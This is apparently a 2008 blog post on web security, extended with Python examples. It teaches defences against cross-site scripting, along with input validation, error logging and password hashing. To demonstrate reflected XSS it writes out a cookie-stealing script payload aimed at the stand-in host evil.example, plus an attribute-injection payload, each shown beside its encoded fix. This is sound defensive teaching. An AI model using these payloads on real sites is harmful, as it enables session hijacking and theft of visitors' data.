Web Security Isn’t Scary!

August 1st, 2008 Posted in Security

Security is the lifeblood of any web application and every online business. No matter how hard you work designing a great site, creating high-end content, building a lively traffic stream, and improving every aspect of your online business, it can easily be stolen away if you aren’t protected.

Protecting your web presence seems like a daunting task, but there are simple measures any webmaster can take to increase the security of their applications.

One of the most common and easiest to exploit security breaches is the cross-site scripting (XSS) attack. Rather than targeting the server itself, these attacks target your website's visitors. The attacker uses a flaw in the application to inject malicious code (usually JavaScript) into the pages the application serves, changing what visitors see and do on your site. Common payloads redirect traffic to another site, change browser settings and/or install ad/spyware, steal cookie data (and with it the visitor's session), and do just about anything else that can be accomplished with JavaScript.
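As an added illustration of the reflected case (example code written for this edit, not from the original post): a search page that echoes its query parameter back into the page, first unencoded and then encoded with Python's standard html.escape(). The payloads and page fragments are constructed for the example, and the Python standard library stands in for whatever platform functions your own application uses.

```python
import html

# Constructed attacker input: a search term that steals the visitor's cookie
# if it is reflected into the page unencoded. Not taken from the original post.
ATTACK = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

# Constructed attribute-context payload: no angle brackets at all, just a
# quote to close the attribute and an event handler that fires on its own.
ATTRIBUTE_ATTACK = '" onfocus="alert(document.cookie)" autofocus="'


def render_vulnerable(search_term: str) -> str:
    """Reflects the parameter straight into an HTML text node: the classic XSS bug."""
    return f"<p>Results for: {search_term}</p>"


def render_hardened(search_term: str) -> str:
    """Encodes &, <, > (and quotes) so the browser shows the payload as text."""
    return f"<p>Results for: {html.escape(search_term, quote=True)}</p>"


def render_attribute_vulnerable(value: str) -> str:
    """Encodes only < and >, which is not enough inside a quoted attribute."""
    partial = value.replace("<", "&lt;").replace(">", "&gt;")
    return f'<input name="q" value="{partial}">'


def render_attribute_hardened(value: str) -> str:
    """quote=True also encodes " and ', so the value cannot end the attribute."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


if __name__ == "__main__":
    for fn, payload in [(render_vulnerable, ATTACK), (render_hardened, ATTACK),
                        (render_attribute_vulnerable, ATTRIBUTE_ATTACK),
                        (render_attribute_hardened, ATTRIBUTE_ATTACK)]:
        print(f"{fn.__name__}:\n  {fn(payload)}")
```

The second pair is the caveat worth remembering: encoding is tied to the context the value lands in. Stripping or encoding angle brackets protects a text node, but a value written inside an attribute, a URL, or a script block needs the encoding appropriate to that context.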

Often an attacker doesn't need to touch your code at all: a crafted URL or form submission is enough to get their script echoed back to other visitors. It is vital that application developers scrub their data and ensure that every piece of data that will be output is validated, checked, and encoded for the context it is written into. That might seem like a chore, but it's fairly simple to make sure your data is safe. Here's a quick list of things to check in every application.

1. Validate all input parameters: When you ask for data on a form, you are expecting a certain type of data. If you aren't validating that data, you are not only leaving a huge security hole, you are also collecting "dirty data". There are hundreds of tutorials on validating forms; if you don't know how, go out and figure it out. Note: don't rely only on JavaScript validation, especially for applications that allow lots of interactivity. Client-side JavaScript is easily bypassed (a request can be sent without ever loading your form), so every check must be repeated on the server. Look into ColdFusion's isValid() for an easy way to check that a value is the type you expect.

2. Another very important element is not allowing HTML to be added through your forms. Allowing HTML opens up numerous security holes. ColdFusion's htmlEditFormat() function escapes the characters HTML is built from (&, <, > and double quotes), so a submitted <script> tag is displayed as text instead of being executed; run it on every parameter before the value is written back into a page. Keep in mind that it is an output-encoding function: apply it at the point where the value is placed into HTML, and remember that a value placed inside an attribute or a block of JavaScript needs the encoding for that context.

3. Be sure to use error handling. Have every error the script produces logged and sent to the administrator, especially for the interactive parts of the site. If someone is attempting to break your script, this tells you what they are doing and when they did it, and gives you insight into how to keep your web applications secure. Show the visitor only a generic message, though: a raw stack trace or database error tells an attacker about your internals.

4. Encrypt your data. Most platforms have built-in encryption tools. USE THEM! There's really no reason not to, especially for sensitive data like credit card and social security numbers. Passwords are the exception: they should never be stored in a reversible form at all. Store a salted hash produced by a slow password-hashing function and compare hashes at login.
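The four points above, worked through as one signup handler (an added example written for this edit, not code from the original post or from any particular platform): every field is validated on the server, the free-text field rejects HTML outright, validation failures and unexpected exceptions are logged to an admin channel while the visitor sees only a generic message, and the password is stored as a salted PBKDF2 hash. The ADMIN_ALERTS list stands in for an email or pager hook (an assumption), the sample forms and IP address are constructed, and reversible encryption of card numbers is not shown because the Python standard library has no cipher for it; use your platform's vetted library for that.

```python
import hashlib
import hmac
import logging
import re
import secrets

# --- 3. Error handling: every failure is logged and delivered to an admin.
# ADMIN_ALERTS stands in for the "send to the administrator" channel (assumed).
ADMIN_ALERTS = []


class AdminAlertHandler(logging.Handler):
    def emit(self, record):
        ADMIN_ALERTS.append(self.format(record))


log = logging.getLogger("signup")
log.addHandler(AdminAlertHandler())
log.setLevel(logging.INFO)

# --- 1. Validation: each field is checked server-side against the type we expect.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
HTML_RE = re.compile(r"<[^>]*>|&#?\w+;")   # tags or HTML entities


class ValidationError(ValueError):
    pass


def validate_signup(form, remote_addr):
    """Returns a clean record or raises ValidationError listing every failed field."""
    errors = []
    email = (form.get("email") or "").strip()
    if not EMAIL_RE.match(email):
        errors.append("email: not a valid address")
    age = None
    try:
        age = int(form.get("age") or "")
        if not 13 <= age <= 120:
            errors.append("age: out of range")
    except ValueError:
        errors.append("age: not an integer")
    # --- 2. No HTML in free-text fields: reject it rather than try to clean it.
    bio = (form.get("bio") or "").strip()
    if HTML_RE.search(bio):
        errors.append("bio: HTML is not allowed")
    if len(bio) > 500:
        errors.append("bio: too long")
    password = form.get("password") or ""
    if len(password) < 12:
        errors.append("password: must be at least 12 characters")
    if errors:
        log.warning("rejected signup from %s: %s", remote_addr, "; ".join(errors))
        raise ValidationError(errors)
    return {"email": email, "age": age, "bio": bio,
            "password_hash": hash_password(password)}


# --- 4. Passwords are stored as a salted, slow hash, never as reversible ciphertext.
PBKDF2_ROUNDS = 600_000


def hash_password(password, salt=None):
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ROUNDS, salt.hex(), digest.hex())


def verify_password(password, stored):
    _algo, rounds, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)   # constant-time compare


def handle_signup(form, remote_addr):
    """Request wrapper: the visitor gets a generic message, the admin gets the details."""
    try:
        record = validate_signup(form, remote_addr)
        return {"ok": True, "email": record["email"]}
    except ValidationError as exc:
        return {"ok": False, "error": "Please correct the highlighted fields.",
                "fields": list(exc.args[0])}
    except Exception:
        log.exception("unexpected error handling signup from %s", remote_addr)
        return {"ok": False, "error": "Something went wrong; the administrator has been notified."}


# Constructed sample submissions (not real users).
SAMPLE_GOOD = {"email": "ann@example.com", "age": "34",
               "bio": "Gardener in Leeds.", "password": "correct horse battery"}
SAMPLE_BAD = {"email": "not-an-email", "age": "abc",
              "bio": "<script>alert(1)</script>", "password": "short"}

if __name__ == "__main__":
    print(handle_signup(SAMPLE_GOOD, "203.0.113.5"))
    print(handle_signup(SAMPLE_BAD, "203.0.113.5"))
    print("admin alerts:", ADMIN_ALERTS)
```

Note that the bad submission produces one alert naming every failed field and the client address, while the response sent back carries no detail beyond which fields to fix.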

While this isn’t a comprehensive list, it does give you a great start and gives you a new outlook on internet security. Remember, it’s up to you to keep your applications safe. Spend the extra few minutes ensuring that your hard work isn’t wiped away.

Author -

who has written 27 posts on [Re]Encoded.com.
